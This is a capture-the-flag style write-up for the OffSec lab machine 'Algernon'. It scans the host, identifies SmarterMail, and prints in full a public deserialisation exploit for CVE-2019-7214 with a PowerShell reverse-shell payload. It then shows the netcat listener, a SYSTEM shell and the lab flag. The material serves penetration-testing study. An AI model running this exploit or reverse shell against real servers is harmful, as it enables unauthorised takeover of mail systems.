Algernon

Enumeration:

Port Scanning:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Algernon]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 192.168.171.65
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-11 01:13 EST
Nmap scan report for 192.168.171.65
Host is up, received echo-reply ttl 125 (0.12s latency).
Scanned at 2025-11-11 01:13:35 EST for 208s 
Not shown: 65521 closed tcp ports (reset)
PORT      STATE SERVICE       REASON          VERSION
21/tcp    open  ftp           syn-ack ttl 125 Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 04-29-20  09:31PM       <DIR>          ImapRetrieval
| 11-10-25  10:12PM       <DIR>          Logs
| 04-29-20  09:31PM       <DIR>          PopRetrieval
|_11-10-25  10:12PM       <DIR>          Spool
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp    open  http          syn-ack ttl 125 Microsoft IIS httpd 10.0
|_http-title: IIS Windows
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
135/tcp   open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 125 Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds? syn-ack ttl 125
5040/tcp  open  unknown       syn-ack ttl 125
9998/tcp  open  http          syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| uptime-agent-info: HTTP/1.1 400 Bad Request\x0D
| Content-Type: text/html; charset=us-ascii\x0D
| Server: Microsoft-HTTPAPI/2.0\x0D
| Date: Tue, 11 Nov 2025 06:16:49 GMT\x0D
| Connection: close\x0D
| Content-Length: 326\x0D
| \x0D
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd">\x0D
| <HTML><HEAD><TITLE>Bad Request</TITLE>\x0D
| <META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD>\x0D
| <BODY><h2>Bad Request - Invalid Verb</h2>\x0D
| <hr><p>HTTP Error 400. The request verb is invalid.</p>\x0D
|_</BODY></HTML>\x0D
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-title: Site doesn't have a title (text/html; charset=utf-8).
|_Requested resource was /interface/root
|_http-favicon: Unknown favicon MD5: 9D7294CAAB5C2DF4CD916F53653714D5
|_http-server-header: Microsoft-IIS/10.0
17001/tcp open  remoting      syn-ack ttl 125 MS .NET Remoting services
49664/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49669/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

<snipped>

FTP (21):

I logged in as anonymous, but did not find anything useful.

HTTP (80):

Just this page.

HTTP (9998):

If we browsed to that port:

We have smartermail running, I could not login with default credentials.

Lets view the source code to try to find the exact version:

Search for public exploits:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Algernon]                                                                                                                   
└─$ searchsploit smartermail                                                                                                                                                
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                            |  Path                           
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
SmarterMail 16 - Arbitrary File Upload                                                                                                    | multiple/webapps/48580.py
SmarterMail 7.1.3876 - Directory Traversal                                                                                                | windows/remote/15048.txt
SmarterMail 7.3/7.4 - Multiple Vulnerabilities                                                                                            | asp/webapps/16955.txt
SmarterMail 8.0 - Multiple Cross-Site Scripting Vulnerabilities                                                                           | asp/webapps/16975.txt
SmarterMail < 7.2.3925 - LDAP Injection                                                                                                   | asp/webapps/15189.txt
SmarterMail < 7.2.3925 - Persistent Cross-Site Scripting                                                                                  | asp/webapps/15185.txt
SmarterMail Build 6985 - Remote Code Execution                                                                                            | windows/remote/49216.py
SmarterMail Enterprise and Standard 11.x - Persistent Cross-Site Scripting                                                                | asp/webapps/31017.php
smartermail free 9.2 - Persistent Cross-Site Scripting                                                                                    | windows/webapps/20362.py
SmarterTools SmarterMail 4.3 - 'Subject' HTML Injection                                                                                   | php/webapps/31240.txt
SmarterTools SmarterMail 5.0 - HTTP Request Handling Denial of Service                                                                    | windows/dos/31607.py
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

We will find RCE with build number close to ours.

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Algernon]
└─$ searchsploit -m windows/remote/49216.py
  Exploit: SmarterMail Build 6985 - Remote Code Execution
      URL: https://www.exploit-db.com/exploits/49216
     Path: /usr/share/exploitdb/exploits/windows/remote/49216.py
    Codes: CVE-2019-7214
 Verified: False
File Type: Python script, ASCII text executable, with very long lines (4852)
Copied to: /home/kali/Desktop/CTF/Machines/OffsecPG/Practice/Algernon/49216.py

Read the script:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Algernon]                                                                                                                   
└─$ cat 49216.py                                                                                                                                                            
# Exploit Title: SmarterMail Build 6985 - Remote Code Execution                                                                                                             
# Exploit Author: 1F98D                                                                                                                                                     
# Original Author: Soroush Dalili                                                                                                                                           
# Date: 10 May 2020                                                                                                                                                         
# Vendor Hompage: re                                                                                                                                                        
# CVE: CVE-2019-7214                                                                                                                                                        
# Tested on: Windows 10 x64                                                                                                                                                 
# References:                                                                                                                                                               
# https://www.nccgroup.trust/uk/our-research/technical-advisory-multiple-vulnerabilities-in-smartermail/                                                                    
#                                                                                                                                                                           
# SmarterMail before build 6985 provides a .NET remoting endpoint                                                                                                           
# which is vulnerable to a .NET deserialisation attack.                                                                                                                     
#                                                                                                                                                                           
#!/usr/bin/python3                                                                                                                                                          
                                                                                                                                                                            
import base64
import socket
import sys
from struct import pack

HOST='192.168.1.1'
PORT=17001
LHOST='192.168.1.2'
LPORT=4444

psh_shell = '$client = New-Object System.Net.Sockets.TCPClient("'+LHOST+'",'+str(LPORT)+');$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.
Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendbac
k2 =$sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Clo
se()'
psh_shell = psh_shell.encode('utf-16')[2:] # remove BOM
psh_shell = base64.b64encode(psh_shell)
psh_shell = psh_shell.ljust(1360, b' ')

payload = 'AAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0c<snipped>V0JDAAAAAoJDAAAAAkYAAAACRYAAAAKCw=='
payload = base64.b64decode(payload)
payload = payload.replace(bytes("X"*1360, 'utf-8'), psh_shell)

uri = bytes('tcp://{}:{}/Servers'.format(HOST, str(PORT)), 'utf-8')

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST,PORT))

msg = bytes()
msg += b'.NET'                 # Header
msg += b'\x01'                 # Version Major
msg += b'\x00'                 # Version Minor
msg += b'\x00\x00'             # Operation Type
msg += b'\x00\x00'             # Content Distribution
msg += pack('I', len(payload)) # Data Length
msg += b'\x04\x00'             # URI Header 
msg += b'\x01'                 # Data Type
msg += b'\x01'                 # Encoding - UTF8
msg += pack('I', len(uri))     # URI Length 
msg += uri                     # URI
msg += b'\x00\x00'             # Terminating Header
msg += payload                 # Data

s.send(msg)
s.close()

As shown above, it exploits the port that we have not yet (17001).

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Algernon]
└─$ nc -nv 192.168.171.65 17001              
(UNKNOWN) [192.168.171.65] 17001 (?) open
asdf
.NETSystem.Runtime.Remoting.RemotingException: Tcp channel protocol violation: expecting preamble.
   at System.Runtime.Remoting.Channels.Tcp.TcpSocketHandler.ReadAndMatchPreamble()
   at System.Runtime.Remoting.Channels.Tcp.TcpSocketHandler.ReadVersionAndOperation(UInt16& operation)
   at System.Runtime.Remoting.Channels.Tcp.TcpServerSocketHandler.ReadHeaders()
   at System.Runtime.Remoting.Channels.Tcp.TcpServerTransportSink.ServiceRequest(Object state)
   at System.Runtime.Remoting.Channels.SocketHandler.ProcessRequestNow()

Indeed we can see there is something related to .net stuff.

Modify the script to add the target IP, and our IP and port:

<snipped>

HOST='192.168.171.65'
PORT=17001
LHOST='192.168.45.187'
LPORT=80

<snipped>

Start a netcat listener:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Algernon]
└─$ rlwrap nc -nlvp 80 
listening on [any] 80 ...

Run the exploit:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Algernon]
└─$ python3 49216.py

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Algernon]
└─$ rlwrap nc -nlvp 80 
listening on [any] 80 ...
connect to [192.168.45.187] from (UNKNOWN) [192.168.171.65] 50032

PS C:\Windows\system32> whoami
nt authority\system

We have a reverse shell as system.

Get the flag:

PS C:\Windows\system32> type \Users\Administrator\Desktop\proof.txt
2e65abb1b3529539a12111a8084c2903

PreviousInternal NextJacko

Last updated 2 months ago

hashtagEnumeration:

hashtagPort Scanning:

hashtagFTP (21):

hashtagHTTP (80):

hashtagHTTP (9998):

Enumeration:

Port Scanning:

FTP (21):

HTTP (80):

HTTP (9998):